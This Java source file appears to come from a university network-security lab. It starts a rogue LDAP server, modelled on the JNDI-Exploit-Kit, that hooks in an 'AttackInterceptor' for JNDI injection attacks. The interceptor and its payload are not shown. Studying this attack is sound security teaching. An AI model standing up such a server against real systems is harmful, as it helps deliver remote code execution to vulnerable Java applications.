package de.seemoo.netsec;

import com.unboundid.ldap.listener.InMemoryDirectoryServer;
import com.unboundid.ldap.listener.InMemoryDirectoryServerConfig;
import com.unboundid.ldap.listener.InMemoryListenerConfig;
import com.unboundid.ldap.sdk.LDAPException;

import javax.net.ServerSocketFactory;
import javax.net.SocketFactory;
import javax.net.ssl.SSLSocketFactory;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.UnknownHostException;

/**
 * Inspired by the class LDAPRefServer of the project JNDI-Exploit-Kit.
 *
 * @see <a href="https://github.com/pimps/JNDI-Exploit-Kit/blob/master/src/main/java/jndi/LDAPRefServer.java">LDAPRefServer.java</a>
 * @see <a href="https://docs.ldap.com/ldap-sdk/docs/index.html">ldap-sdk documentation</a>
 * @see <a href="https://ldap.com/">LDAP documentation</a>
 */
public class LDAPServer implements Runnable {

    // LDAP works like a hierarchical structure - Expressions are read from right to left
    // Here we're defining the domain component (short: dc).
    // It has no real influence on the attack, but must be passend to the LDAP server.
    // https://stackoverflow.com/a/33961313/4106848
    private static final String LDAP_BASE = "dc=netsec,dc=seemoo,dc=de";
    // 389 is the standard LDAP port for unencrypted connections.
    private static final int LDAP_PORT = 389;

    public static void main(String[] args) {
        // Start the LDAP server in a new thread, because it doesn't block
        Thread thread = new Thread(new LDAPServer());
        thread.start();
        // While the server runs, sleep in this thread to keep the program running
        try {
            Thread.sleep(Long.MAX_VALUE);
        } catch (InterruptedException e) {
            throw new RuntimeException(e);
        }
    }

    @Override
    public void run() {
        try {
            this.start();
        } catch (LDAPException | UnknownHostException ex) {
            System.err.println("Exception while starting the LDAP server:");
            ex.printStackTrace();
        }
    }

    public void start() throws LDAPException, UnknownHostException {
        InMemoryDirectoryServerConfig config = new InMemoryDirectoryServerConfig(LDAP_BASE);
        // Configure the LDAP server to use the standard port, listen on 0.0.0.0,
        // use standard socket factories and disables STARTTLS.
        config.setListenerConfigs(new InMemoryListenerConfig(
                "LDAP", null, LDAP_PORT,
                null, null, null
        ));
        // Add interceptor for modifying the request
        config.addInMemoryOperationInterceptor(new AttackInterceptor());

        // Start the LDAP server
        InMemoryDirectoryServer server = new InMemoryDirectoryServer(config);
        server.startListening();
        System.out.println("LDAP Server listening on port " + LDAP_PORT);
    }

}
